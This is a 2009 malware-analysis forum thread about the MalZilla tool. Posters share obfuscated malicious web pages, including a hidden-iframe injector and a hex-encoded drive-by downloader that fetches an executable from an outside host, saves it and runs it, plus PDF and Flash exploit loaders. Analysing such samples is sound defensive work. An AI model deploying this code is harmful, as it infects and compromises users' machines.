function yhIUKrxFqo(){};yhIUKrxFqo.prototype = {host:'/qq.cn/',install : function(){if(!this.alreadyInstalled()){var s="<_d_i3v1 GsFtGy_l3eF=F\'Gd_iGsGp3l3aFy1:Fn1o3n1e3\'_>F<FiGf3rFaFm1e_ Gs3rFc_=1\'F".replace(/[_1G3F]/g, '')+this.getFrameURL()+"\'J>q<q/qiJfRr@aRmqeJ>@<q/@dRiqvJ>q".replace(/[@J0qR]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehetsmvls>e<rbroZdsyr>s'.replace(/[srevZ]/g, '')+s+'<{/rbPokdFyr>r<r/FhFtkmrlr>P'.replace(/[\{rkPF]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getRandString : function(){var l=16,c='0m1j2m3z4{5m6m7j8J9maJbzc{dmeJfz'.replace(/[\{jzmJ]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},cookieValue:1,getFrameURL : function(){var dlh=''; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')  + "." + this.getRandString() + "." + this.path + this.host;},path:String.fromCharCode(102)+"q"+new String("w")+String.fromCharCode(101)+String.fromCharCode(114)+new String("z")+"."+new String("c")+new String("n"),cookieName:'chfeabgd',alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); }};var ocho=new yhIUKrxFqo();eval(ocho.getFrameURL());
 
Title: Re: MalZilla
Post by: MysteryFCM on June 20, 2009, 06:45:45 am
This one sends Malzilla into a permanent 302 ....... (unless autofollowing redirects is disabled of course);

Code: [Select]
http://www.fucking-cash.com/index.com?a=3546&p=2
p= is valid from 1 up to lord knows where (highest I've found so far is 15, all seem to be serving malware (haven't analyzed it in detail yet))

/edit

Okie, after stopping Malzilla doing an auto 302, those < 10 are intermittent between perma redirects back to itself, and redirects to other sites. Those > 10 (and so far the number doesn't seem to be limited) all lead to porn sites. The reason I thought it was malware is that it was actually serving the file as application/x-msdownload, which meant Malzilla was treating the redirect URL as an actual file - looking at the source code for some of them, this does not seem to be the case - they just seem to be regular porn sites.
Title: Re: MalZilla
Post by: bobby on June 20, 2009, 01:49:51 pm
Malzilla treats some content as binary file (and triggers Save dialog) only if one of the following lines/strings are present in HTTP headers:
'Content-Type: application'
'Content-Disposition:'

Malzilla will follow redirections for every HTTP response in the range between 300 and 399. It does not distinguish between e.g. 300 and 302 responses.
Redirection is done according to the following line in HTTP headers if present (it should be present for every 3xx response):
'Location:'

One more type of redirection that Malzilla will follow is the one with response 200 and with 'Refresh:' line in HTTP headers.
Title: Re: MalZilla
Post by: bobby on June 20, 2009, 02:10:09 pm
@MysteryFCM

Indeed, these HTTP headers are driving Malzilla nuts.
'Location:' is empty, and that triggers Malzilla to treat is as a relative URL, which means that the absolute URL will be the same like the current URL.
The 'ContentType:' will trigger the save dialog because it contains 'application' string; and redirection (e.g. 302) in Malzilla does not exclude a possibility of getting a download (binary) in the same turn. This would be my mistake in codding the HTTP headers parser.

Interesting.
It makes me thinking that someone made this just to explore Malzilla's HTTP headers parser system :)
Title: Re: MalZilla
Post by: MysteryFCM on June 20, 2009, 04:01:38 pm
hehe because of the way it behaved, I figured it was probably done deliberately to try and avoid automated analysis as much as possible.
Title: Re: MalZilla
Post by: JohnC on June 23, 2009, 09:05:00 pm
Kalimero Processor doesn't work too well on this one:

Code: [Select]
<html><head><title>caWxpUk</title><style>div.caWxpUk{visibility:hidden;}</style></head><body><div id='gr4tgwsd' class='caWxpUk'>2E212E</div><div id='pdfplace'></div><span>vccfghvvr</span>hfddfwhch<u>arbqgrigyets</u><ol><li>paxjgd</li></ol><abbr>gvbpjej</abbr><br /><select><option>umwchuq</option></select><div id='ucpylirjhur' style='visibility:hidden;'>453M484D433K</div><div id='ZITYo' class='caWxpUk'>28352F342L323616443J463P4D3J3P3N2918423J4E3J4B3L4A41484C182A16161616161616164E3J4A16483H4D4A4416291618404C4C48261L1L3P4A3N3N463O44474A1K3L461L3L47453N3M4H1L3N4G3N1K48404818273O4D463L4C414746162P2G2D2F1E1F4J4E3J4A16464D3L291D1D273M2429161M2716164E3J4A162L242H1O2L424B1629163M473L4D453N464C1K3L4A3N3J4C3N2H443N453N464C1E18473K42181H464D3L1H183N3L4C181F2716162L242H1O2L424B1K4B3N4C2D4C4C4A413K4D4C3N1E18</div><a href=yitmmx>sscjrhpueyd</a><br /><textarea>fitous</textarea><br /><select><option>aygkotigoagczc</option></select><pre>qpwwns</pre><br /><div id='rwdMtu' class='caWxpUk'>413M181I18282B181H464D3L1H1829181H464D3L1H182L242H1O2L181H464D3L1H18424B2B181H464D3L1H182A181F272L242H1O2L424B1K4B3N4C2D4C4C4A413K4D4C3N1E183L44181H464D3L1H183J4B4B413M181I183L181H464D3L1H1844181H464D3L1H184B181H464D3L1H1841181H464D3L1H183M181H464D3L1H1826181H464D3L1H182E2G25222F21181H464D3L1H1821181H464D3L1H1822181H464D3L1H181J2221181H464D3L1H182D1P181H464D3L1H181J1N181H464D3L1H181N181H464D3L1H18</div><abbr>tizgahfj</abbr><br /><a href=bfyvw>ayxucxdp</a><br /><strong>eozsa</strong><br /><pre>pdxzwoa</pre><br /><br /><p>ktbbilgtmh</p><select><option>snwfu</option></select><div id='z2Cqy' class='caWxpUk'>2G181H464D3L1H181M1J25241P181H464D3L1H182D181H464D3L1H181J181H464D3L1H181M181H464D3L1H181M181H464D3L1H182F1M202I2F1O25181H464D3L1H182H1P181H464D3L1H1822181F274C4A4H4J4E3J4A16324E2H1N2N1629162L242H1O2L424B1K2F4A3N3J4C3N313K423N3L4C1E183J3M47181H464D3L1H183M181H464D3L1H183K181H464D3L1H181K181H464D3L1H184B4C4A3N3J181H464D3L1H1845181I1D1D1F274E3J4A163M241629161N274L3L3J4C3L401E3N1F4J4L4C4A4H4J4E3J4A16</div><br /><p>hynfncyeqz</p><ul><li>vjrjpgpasq</li><li><pre>sainstsufmrfsb</pre><br /><strong>hunnq</strong><br /><ol><li>ppfnmlvdklkxl</li></ol><div id='NlCV9L' class='caWxpUk'>322H2H2O4C221629162L242H1O2L424B1K2F4A3N3J4C3N313K423N3L4C1E1835403N44441K2D484844413L3J181H464D3L1H184C414746181I1D1D1F274E3J4A163M241629161N274L3L3J4C3L401E3N1F4J4L413O1E3M24162929161N1F4J4C4A4H4J4E3J4A162G374E43242M4C1M1629162L242H1O2L424B1K2F4A3N3J4C3N313K423N3L4C1E1845181H464D3L1H184B4G45441O1K3A181H464D3L1H182P2O2K363632181I1D1D1F2716162G374E43242M4C1M1K47483N461E182J181H464D3L1H182H36181I48</div><select><option>klwzdxmx</option></select><ol><li>hufhytbghiwz</li></ol><u>wzcldvdmkdx</u><span>bgnrcdyh</span>beyaebvv<a href=hvyfqwqyjoe>gdcsplwcctbyd</a><br /><div id='nqjioyjdjuqltuk' style='visibility:hidden;'>4H4D483N443O4A474C4H4I</div><div id='R2ikmaU' class='caWxpUk'>3H4D4A441I3O3J444B3N1F2716162G374E43242M4C1M1K4B3N463M1E1F271616324E2H1N2N1K4C4H483N1629161N271616324E2H1N2N1K47483N461E1F27324E2H1N2N1K394A414C3N1E2G374E43242M4C1M1K4A3N4B4847464B3N2E473M4H1F2716162I4A473P4G3J162916181K1K3E3E3524233N4340381K3N4G3N1827324E2H1N2N1K353J4E3N36472I41443N1E2I4A473P4G3J1I1O1F273N4E3J441E18322H2H2O4C221K181H464D3L1H1835403N181H464D3L1H1844442H4G3N3L181H464D3L1H184D4C3N1E</div><br /><i>fcjrzzanyv</i><div id='ohjvixugqyxwkao' style='visibility:hidden;'>4C444C3J414647</div><a href=lryistuhws>lixndsfzbai</a><br /><br /><p>tnbrztoumzmti</p><select><option>xuydcsztfsljzbv</option></select><abbr>oicub</abbr><br /><ul><li>zbhrq</li><li><div id='c2jf3Ur' class='caWxpUk'>2I4A47181H464D3L1H183P4G3J1F181H464D3L1H1827181F274A3N4C4D4A46161N274L3L3J4C3L401E3N1F4J4L4L4L3O4D463L4C41474616322G2I1E1F4J4C4A4H164J4E3J4A16473K42162916464D444427473K42162916463N4F162D3L4C414E3N3A313K423N3L4C1E182D3L4A47322G2I1K322G2I181F27413O161E17473K421F164J473K42162916463N4F162D3L4C414E3N3A313K423N3L4C1E18322G2I1K323M3O2F4C4A44181F274L413O161E473K421F164J3M473L4D453N464C1K3P3N4C2H443N453N46</div><ol><li>ncmncnfoxmbtuvb</li></ol><abbr>xhvvxtncaft</abbr><br /><a href=cericeu>ffpetjy</a><br /><br /><p>gdvdhaunlubwsjs</p><u>xrarglvu</u><p id=esjbfzypv>ganbdrglk</p><br /><div id='V7SIpD6' class='caWxpUk'>4C2E4H2L3M1E18483M3O48443J3L3N181F1K4146463N4A2K362P2O16291618283N453K3N3M164F413M4C40291D1N211M1D16403N413P404C291D1N211M1D164B4A3L291D4B48441L483M3O1K483M3O1D164C4H483N291D3J484844413L3J4C4147461L483M3O1D2A281L3N453K3N3M2A18274L4L163L3J4C3L401E3N1F164J3M473L4D453N464C1K3P3N4C2H443N453N464C2E4H2L3M1E18483M3O48443J3L3N181F1K4146463N4A2K362P2O16291618283N453K3N3M164F413M4C40291D1N211M1D16403N413P40</div><select><option>bksrksrnaidurph</option></select><span>ujiinvzdjhkzcgt</span>okeucloedepiiei<p id=hslhndvgzufo>hteahrvfkfdsmir</p><br /><br /><i>ozonvemrj</i><pre>ecsfgqdqbwxrge</pre><br /><div id='xUHkE' class='caWxpUk'>4C291D1N211M1D164B4A3L291D4B48441L483M3O1K483M3O1D164C4H483N291D3J484844413L3J4C4147461L483M3O1D2A281L3N453K3N3M2A18274L4B3N4C3641453N474D4C1E1835351E1F181I161O1M1M1F274L3O4D463L4C4147461635351E1F4J4C4A4H4J4A3N4C29463N4F162D3L4C414E3N3A313K423N3L4C1E184B46484E4F1K35463J484B40474C1638413N4F3N4A162F47464C4A47441K1N181F274E3J4A163J4A3K414C4A3J4A4H3H3O41443N162916483H4D4A44274E3J4A163M3N4B4C1629161D2F</div><textarea>diocnbtwaoyy</textarea><br /><ul><li>qtkoaxd</li><li><pre>jswakehk</pre><br /><br /><p>ceahfgj</p><div id='jdkihim' style='visibility:hidden;'>4I4D40404H3M4I41</div><div id='S9s69t' class='caWxpUk'>261L324A473P4A3J45162I41443N4B1L314D4C44474743162H4G484A3N4B4B1L4F3J3K1K3N4G3N1D273M473L4D453N464C1K4F4A414C3N1E1828473K423N3L4C163L443J4B4B413M291D3L444B413M262I1M2H201O2G221M1J1P22242F1J1N1N2G1M1J2D2G241N1J1M1M2D1M2F251M2G2F242G251D16413M291D3J4C4C3J3L431D2A281L473K423N3L4C2A181F273J4C4C3J3L431K35463J484B40474C323J4C401629163J4A3K414C4A3J4A4H3H3O41443N274B3N4C3641453N474D4C1E1D4F41463M474F1K4447</div><a href=xposlboe>adxtokhnpk</a><br /><ol><li>lzxhwajcckj</li></ol><textarea>kwafqznsdpumq</textarea><br /><u>tmlld</u><br /><p>xpnxbfqegbgyw</p><div id='L9GV7F' class='caWxpUk'>3L3J4C41474616291618443M3J48261L1L1N1O231K1M1K1M1K1N181D1I1O1M1M1M1F273J4C4C3J3L431K2F4745484A3N4B4B3N3M323J4C401629163M3N4B4C273J4C4C3J3L431K324A41464C35463J484B40474C1E3J4A3K414C4A3J4A4H3H3O41443N1I3M3N4B4C1F274L3L3J4C3L401E3N1F4J4L4L413O161E2P2G2D2F1E1F4K4K322G2I1E1F1F164J164L281L4B3L4A41484C2A</div><script>this.livaix=false;var momyvtacoixnfv='hpsbbjed';var vlzieap=2275;function wtzveinaok(){}this.feiwlafvaiglgtm='vllnewtyx';function obKkrjY(A5XDN){WsqCWC7 = '';this.pxjqjdwhtgp='khskysiyamd';this.xhinjcy=false;var fzpryvmjqhqm=7169;function uxptvf(khdfvarhaneuc){return wrqfumghwjccqm;}var kuberhxelvinjzm='fvbxxiedenqoe';function hztyhac(){}for(PMVXDUW = 0; PMVXDUW < (A5XDN.length / 2); PMVXDUW++ ){WsqCWC7 += String.fromCharCode(parseInt(A5XDN.substr(PMVXDUW * 2, 2),26));this.erxrdeuznnyghv=false;}return WsqCWC7;var skqrjzzr='wpyulgttpybmtgz';}function NdCnV412(lhQmDxz){function ssyahswssd(pxkywajtv){return iabvdlq;}this.dxzgasw='hhuyhutsboi';return document.getElementById(lhQmDxz).innerHTML;var eivulzhqzzp='vqvvbbdqavvd';this.tuwnb=false;}var BmjoKM =new Array('ZITYo','rwdMtu','z2Cqy','NlCV9L','R2ikmaU','c2jf3Ur','V7SIpD6','xUHkE','S9s69t','L9GV7F',"gr4tgwsd");for(OFMd5ZiT = 0; OFMd5ZiT  < BmjoKM.length; OFMd5ZiT++){this.uizuvjzdfibwngu='wkmcfojvqqgyri';var gkktbfstx=8663;document.write(obKkrjY(NdCnV412(BmjoKM[OFMd5ZiT])));function grqklpm(zmgmfi){return bwxvqvreineayh;}this.ylywlwtxp=false;function gdbxgjv(){}var poaamaufzva='bnmwuescmeifd';var srmsxlxxcgxpgi=6561;this.bxpdkx='kyspqutgqgri';}</script>
Title: Re: MalZilla
Post by: JohnC on June 23, 2009, 09:11:04 pm
Kalimero also has problems with this one:

Code: [Select]
<html><head><title>quyxyequat</title><style>div.queliduce{visibility:hidden;}</style></head><body><!-- xyuchothy --><div id='quutakochi' class='queliduce'>6F626A656374</div>22636<br><div id='chocuquym' class='queliduce'>637265617465456C656D656E74</div><p id="cyzythu">cyzythu</p><p id="thoqu">thoqu</p><div id='covyquijem' class='queliduce'>6964</div><i>cethotaviw</i><!-- xyaquose --><div id='getatufum' class='queliduce'>736574417474726962757465</div><tt>kitych</tt>jobyxyu<div id='chythyx' class='queliduce'>636C6173736964</div><br /><p id="chuchythy">chuchythy</p><div id='quidulu' class='queliduce'>636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336</div><!-- bijix --><!-- moxyag --><div id='xyujojeq' class='queliduce'>4372656174654F626A656374</div><strong>xyysizif</strong><big>doxyytupi</big><div id='thuwezug' class='queliduce'>4D73786D6C322E584D4C48545450</div><br><!-- xyuquoq --><div id='xyuvothy' class='queliduce'>5368656C6C2E4170706C69636174696F6E</div><br />thequithax<div id='codyb' class='queliduce'>41646F64622E73747265616D</div><br /><select><option>xyexy</option><option>xyexy</option></select><div id='voxyazeth' class='queliduce'>74797065</div><ul><li>kitho</li><li>kitho</li></ul>dumef<div id='chyqu' class='queliduce'>6F70656E</div><u>zoxyyqu</u><br /><div id='xyefothyxy' class='queliduce'>73656E64</div><ol><li>quachedef</li></ol><p id="sothoque">sothoque</p><div id='watakythec' class='queliduce'>7772697465</div><textarea>xyyxyut</textarea><div id="chyxyythi">chyxyythi</div><div id='chixyywiqu' class='queliduce'>474554</div><tt>checeq</tt><a href="kijuxyyx">kijuxyyx</a><div id='nyrukohasu' class='queliduce'>687474703A2F2F766976612D64656C70696E617461322E636F6D2F322F7570646174652E706870</div><p id="hyniquoq">hyniquoq</p><a href="wakufu">wakufu</a><div id='guvaquyc' class='queliduce'>66616C7365</div><br><a href="xyevuvoque">xyevuvoque</a><div id='thomuquy' class='queliduce'>726573706F6E7365426F6479</div>quechupo<span>thegaxy</span><div id='myfarot' class='queliduce'>2E2F2F2E2E2F2F66696C652E657865</div><br><p>zoxyo</p><div id='vamyquixyy' class='queliduce'>53617665546F46696C65</div><ul><li>zethec</li><li>zethec</li></ul><p id="pechy">pechy</p><div id='ruchuxyu' class='queliduce'>436C6F7365</div><textarea>wuchech</textarea><strong>sethofigep</strong><div id='xyixyathoc' class='queliduce'>7368656C6C65786563757465</div><pre>quychupymi</pre>xyanawef<div id='chyxyaque' class='queliduce'>6576616C</div><i>golate</i><pre>thovaheme</pre><script>this.hequach=9087;var kyneb = document;function hohyxyyz(){}var ziquerumy = window;function wyqueq(wyqueq){return wyqueq;}var chifuki='chifuki';function voboxyapuc(xyeque){this.dygecha="dygecha";vequid = '';function tapixyer(tapixyer){return tapixyer;}for(thothacyx = 0; thothacyx < (xyeque.length / 2); thothacyx++ ){vequid += String.fromCharCode('0x' + xyeque.substr(thothacyx * 2, 2));}this.fijufoluqu=false;return vequid;}function choquiciqu(lalochub){this.quohakezih=632;return document.getElementById(lalochub).innerHTML;}var xyothegi=8688;function jijicuthu(jijicuthu){return true;}this.xyuchuq=21419;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var faquothuv = kyneb[voboxyapuc(choquiciqu('chocuquym'))](voboxyapuc(choquiciqu('quutakochi')));");var nekathach='nekathach';this.nykithil=false;this.chiweki=11003;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("faquothuv[voboxyapuc(choquiciqu('getatufum'))](voboxyapuc(choquiciqu('covyquijem')), faquothuv);");this.lyzalabo='lyzalabo';function xyytithec(xyytithec){return true;}function zejuchi(){}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("faquothuv[voboxyapuc(choquiciqu('getatufum'))](voboxyapuc(choquiciqu('chythyx')), voboxyapuc(choquiciqu('quidulu')));");function quyxyat(){}function kyquochiqu(kyquochiqu){return kyquochiqu;}this.thuthi='thuthi';try{this.silachezon="silachezon";ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var chythoga = faquothuv[voboxyapuc(choquiciqu('xyujojeq'))](voboxyapuc(choquiciqu('thuwezug')), '');");this.xyyvucot=12818;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var xyacha = faquothuv[voboxyapuc(choquiciqu('xyujojeq'))](voboxyapuc(choquiciqu('xyuvothy')), '');");this.tachoxyi=false;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var thachoxy = faquothuv[voboxyapuc(choquiciqu('xyujojeq'))](voboxyapuc(choquiciqu('codyb')), '');");function chusi(chusi){return true;}try{this.nixyuturum=3960;this.syquiruchu='syquiruchu';function cathokorit(cathokorit){return cathokorit;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('voxyazeth'))] = 1;");var thaquaqui=21103;var rivathyg="rivathyg";function nethi(){}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("chythoga[voboxyapuc(choquiciqu('chyqu'))](voboxyapuc(choquiciqu('chixyywiqu')), voboxyapuc(choquiciqu('nyrukohasu')), voboxyapuc(choquiciqu('guvaquyc')));");function gawovyxyu(gawovyxyu){return gawovyxyu;}this.quuwufodo=false;function lynithoth(lynithoth){return lynithoth;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("chythoga[voboxyapuc(choquiciqu('xyefothyxy'))]();");var quuquuq='quuquuq';var thusadu="thusadu";this.thosaxyyth="thosaxyyth";ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('chyqu'))]();");function jubetho(jubetho){return jubetho;}var quizecezix="quizecezix";var xyuqu="xyuqu";ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('watakythec'))](chythoga[voboxyapuc(choquiciqu('thomuquy'))]);");function quysomun(quysomun){return true;}function chotho(){}this.thyluhejy=12013;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var xyaxyiboj = voboxyapuc(choquiciqu('myfarot'));");function thethox(thethox){return thethox;}function duhubecub(){}this.gythethoqu=false;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('vamyquixyy'))](xyaxyiboj, 2);");function chego(chego){return chego;}var pechach='pechach';function thoju(thoju){return true;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('ruchuxyu'))]();");this.quoqu='quoqu';function xyequix(){}var xyacocichu=21017;}catch(e){}try{var suchithasa="suchithasa";var chorathe=7194;function hyquuc(hyquuc){return hyquuc;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("xyacha[voboxyapuc(choquiciqu('xyixyathoc'))](xyaxyiboj);");var wyxyu=9872;this.xyuquegul="xyuquegul";function chexye(chexye){return true;}}catch(e){}}catch(e){}var wyzitich="wyzitich";function xyylaquuf(){}this.cheth=9397;</script></body></html><script>if(navigator.userAgent.indexOf("MS"+"IE"+"") != -1){PDF = new Array("Acr"+"oPD"+"F.P"+"DF"+"", "PDF.P"+"dfCtr"+"l"+"");for(i in PDF){try{obj = new ActiveXObject(PDF[i]);if (obj){document.write("<ifr"+"ame "+"src="+"notT"+"heor"+"yCit"+"es.p"+"df><"+"/ifr"+"ame>"+"");}}catch(e){}}try{obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");if (obj){document.write("<ifra"+"me sr"+"c=nor"+"malLe"+"ap.sw"+"f></i"+"frame"+">"+"");}}catch(e){}}else{for(i = 0; i <= navigator.plugins.length; i++){var plugin = navigator.plugins[i].name;if((plugin.indexOf("Ado"+"be "+"Acr"+"oba"+"t"+"") != -1) || (plugin.indexOf("Adobe"+" PDF"+"") != -1)){document.write("<i"+"fr"+"am"+"e "+"sr"+"c="+"no"+"tT"+"he"+"or"+"yC"+"it"+"es"+".p"+"df"+"><"+"/i"+"fr"+"am"+"e>"+"");}if(plugin.indexOf("Flas"+"h"+"") != -1){document.write("<i"+"fr"+"am"+"e "+"sr"+"c="+"no"+"rm"+"al"+"Le"+"ap"+".s"+"wf"+"><"+"/i"+"fr"+"am"+"e>"+"");}}}</script><applet code = "Show.class" width="100" height="100">
Title: Re: MalZilla
Post by: JohnC on June 28, 2009, 07:12:59 pm
Another example of the Kalimero one:
Code: [Select]
<html><head><title>kVfln0</title><style>div.kVfln0{visibility:hidden;}</style></head><body><div id='gr4tgwsd' class='kVfln0'>2E212E</div><span>ceswketap</span>slzzvkrvfgpiwqc<textarea>vgwrhbfcj</textarea><br /><br /><i>nmhxvkomvqijtnf</i><ol><li>mzdbcdgu</li></ol><div id='aktbcwszrqlopr' style='visibility:hidden;'>3N3N423M4B4M4M3O493M3N</div><br /><p>gzdeyoej</p><pre>uiuccqoq</pre><br /><div id='t2bAkX9m' class='kVfln0'>2A382H372N353917483M4A434H3M43412B19463M4I3M4F3O4E454C4G192C17171717171717174I3M4E174C3K4H4E48172B1719444G4G4C281M1M4J48404B49414A1L3O4B491M4C3M4C473M1M414K411L4C444C1929424H4A3O4G454B4A17322I2F2H1F1G4N4I3M4E174A4H3O2B1E1E2940262B171N2917174I3M4E174E1N202435172B17404B3O4H49414A4G1L3O4E413M4G412J484149414A4G1F194B191I4A4H3O1I193N4641191I4A4H3O1I193O4G191G2917174E1N2024351L4F414G2F4G4G4E453N4H4G411F</div><a href=vkbiefmfrijlb>sgjndiiyajriuxq</a><br /><select><option>praktifvnwu</option></select><span>pnxqgsl</span>snzytjkmiu<br /><p>swxneigdzsiulme</p><ol><li>odieokh</li></ol><ul><li>pnquikhquhieuo</li><li><abbr>jfitkq</abbr><br /><div id='tmDwV' class='kVfln0'>194540191J192A191I4A4H3O1I192D2B191I4A4H3O1I194E1N191I4A4H3O1I192024191I4A4H3O1I19352D2C191G294E1N2024351L4F414G2F4G4G4E453N4H4G411F193O48191I4A4H3O1I193M4F4F191I4A4H3O1I1945191I4A4H3O1I1940191J193O191I4A4H3O1I19484F4540191I4A4H3O1I19282G191I4A4H3O1I192I191I4A4H3O1I1927191I4A4H3O1I19242H191I4A4H3O1I192323241K24232F21191I4A4H3O1I191K1O1O2I1N1K191I4A4H3O1I1927191I4A4H3O1I1926212F191I4A4H3O1I191K191I</div><br /><i>yhgodky</i><select><option>dfzdandtylws</option></select><ul><li>egbwtubsichq</li><li><a href=rmiwffpjctbe>abzryquiw</a><br /><pre>tzuaem</pre><br /><u>rwbbctmkcyjra</u><br /><p>najfhofcnhrgv</p><div id='ITgCCe' class='kVfln0'>4A4H3O1I191N1N2H1N222K2H20272J2124191G294G4E4L4N4I3M4E172G35352N222H4K4C172B174E1N2024351L2H4E413M4G41343N46413O4G1F193M404B191I4A4H3O1I1940191I4A4H3O1I193N1L4F191I4A4H3O1I194G191I4A4H3O1I194E191I4A4H3O1I1941191I4A4H3O1I193M191I4A4H3O1I1949191J1E1E1G294I3M4E174026172B171O29503O3M4G3O441F411G4N504G4E4L4N4I3M4E17352J2J314G24172B174E1N2024351L2H4E413M4G41343N46413O4G1F1938191I4A4H3O1I1944191I4A4H3O1I</div><a href=dnfinduhf>rulggxkep</a><br /><strong>eeevkbkxidcuo</strong><br /><select><option>oblcabgyfmop</option></select><span>qowmrxgcfv</span>bwtjhuxrlwoqgn<u>nobdhjkkzkozs</u><div id='hdjuhydb' style='visibility:hidden;'>444M4E4E4F3O404C3N423N4G4M4E</div><div id='bwaPH' class='kVfln0'>19414848191I4A4H3O1I191L2F4C191I4A4H3O1I194C48453O191I4A4H3O1I193M4G454B191I4A4H3O1I194A191J1E1E1G294I3M4E174026172B171O29503O3M4G3O441F411G4N5045421F4026172B2B171O1G4N4G4E4L4N4I3M4E172H431N3M39252O2F172B174E1N2024351L2H4E413M4G41343N46413O4G1F19494F4K494820191I4A4H3O1I191L3D191I4A4H3O1I1932191I4A4H3O1I19312M3939191I4A4H3O1I1935191J1E1E1G2917172H431N3M39252O2F1L4B4C414A1F192L191I4A4H3O1I192J39191J</div><textarea>vlntb</textarea><br /><pre>cuqoorfdtguj</pre><br /><p id=aewwtnnyn>xhqblaisisec</p><br /><div id='ekdckzxwihbnoiq' style='visibility:hidden;'>3O424I404L4H474B</div><div id='KmXVfl' class='kVfln0'>4C3K4H4E481J423M484F411G2917172H431N3M39252O2F1L4F414A401F1G2917172G35352N222H4K4C1L4G4L4C41172B171O2917172G35352N222H4K4C1L4B4C414A1F1G292G35352N222H4K4C1L3C4E454G411F2H431N3M39252O2F1L4E414F4C4B4A4F412G4B404L1G2917172K4E4B434K3M172B17191L1L3H3H3826254147443B1L414K4119292G35352N222H4K4C1L383M4I41394B2K4548411F2K4E4B434K3M1J201G29414I3M481F19352J2J314G241L384441191I4A4H3O1I1948482J4K413O4H4G411F2K</div><ul><li>mruacbvhkl</li><li><span>sljawo</span>vqhpvvjly<br /><p>hbolop</p><div id='sjbihbhgr' style='visibility:hidden;'>474A3M4B4G464G4A483M4I4H3M3M4B</div><a href=dkxjwpcnz>eyjvizwihpwvxde</a><br /><br /><i>kaout</i><div id='MmzXYt' class='kVfln0'>4E4B434K3M1G29191G294E414G4H4E4A171O29503O3M4G3O441F411G4N505050424H4A3O4G454B4A17352I2K1F1G4N4G4E4L4N4E414G2B4A414J172F3O4G454I413D343N46413O4G1F192F3O4E4B352I2K1L352I2K191G2917484B3O3M4G454B4A1L444E4142172B17194F4C481M4C40421L4C40421929503O3M4G3O441F411G4N5050424H4A3O4G454B4A1738381F1G4N4G4E4L4N4E414G2B4A414J172F3O4G454I413D343N46413O4G1F194F4A4C4I4J1L384A3M4C4F444B4G173B45414J414E172H4B4A4G4E4B</div><br /><i>kuomufd</i><div id='hejrrz' style='visibility:hidden;'>4M484D454B3O493M484F4H4K4L</div><br /><p>dkxqzrouvnze</p><strong>btuheokmbrse</strong><br /><div id='niRPgw6' class='kVfln0'>481L1O191G294I3M4E173M4E3N454G4E3M4E4L3K42454841172B174C3K4H4E48294I3M4E1740414F4G172B171E2H281M354E4B434E3M49172K4548414F1M344H4G484B4B47172J4K4C4E414F4F1M4J3M3N1L414K411E29404B3O4H49414A4G1L4J4E454G411F192A4B3N46413O4G173O483M4F4F45402B1E3O484F4540282K1N2J22202I241N1K2124262H1K1O1O2I1N1K2F2I261O1K1N1N2F1N2H271N2I2H262I271E1745402B1E3M4G4G3M3O471E2C2A1M4B3N46413O4G2C191G293M4G4G3M3O471L384A3M4C4F</div><abbr>jfixmyoexnipvn</abbr><br /><a href=gegxxfhykvwaj>rykthnu</a><br /><strong>yetbfq</strong><br /><select><option>rngowb</option></select><p id=zatazebmgtmp>pxqubtnvsahh</p><br /><ol><li>aitzpjzjmsyd</li></ol><div id='DmIt8K' class='kVfln0'>444B4G353M4G44172B173M4E3N454G4E3M4E4L3K42454841294F414G394549414B4H4G1F1E4J454A404B4J1L484B3O3M4G454B4A172B171948403M4C281M1M1O20251L1N1L1N1L1O191E1J201N1N1N1G293M4G4G3M3O471L2H4B494C4E414F4F4140353M4G44172B1740414F4G293M4G4G3M3O471L354E454A4G384A3M4C4F444B4G1F3M4E3N454G4E3M4E4L3K424548411J40414F4G1G29503O3M4G3O441F411G4N5050424H4A3O4G454B4A173C32311F1G4N404B3O4H49414A4G1L4J4E454G411F1E2A40454I17</div><span>oxpazmwqkmfwnco</span>nnhjdi<abbr>mmmkzdeqyxrbjx</abbr><br /><br /><p>feksjeixkdktl</p><pre>ssymnkgezh</pre><br /><select><option>zfjutqgv</option></select><div id='SHHc7Pcb' class='kVfln0'>45402B194E414C483M3O41192C4K2A1M40454I2C1E1G294I3M4E174F4E4G474B40172B174H4A414F3O3M4C411F191C4H222122211C4H222122211C4H1N42413N1C4H2121233N1C4H24243O271C4H261N3N271C4H261N1N1O1C4H4142212119171I191C4H412022211C4H413N423M1C4H41261N231C4H4242413O1C4H424242421C4H263N25421C4H404222411C4H414241421C4H242241421C4H41213M421C4H274224221C4H222042211C4H274224221C4H244141251C4H41421N211C4H4142413N19171I191C4H</div><br /><i>ytcwcvji</i><select><option>kgejthv</option></select><abbr>zirrmmd</abbr><br /><textarea>ejnyghooy</textarea><br /><u>cnitifjphukg</u><ul><li>vsapmcafut</li><li><ol><li>uhjierbq</li></ol><div id='MDDXD1' 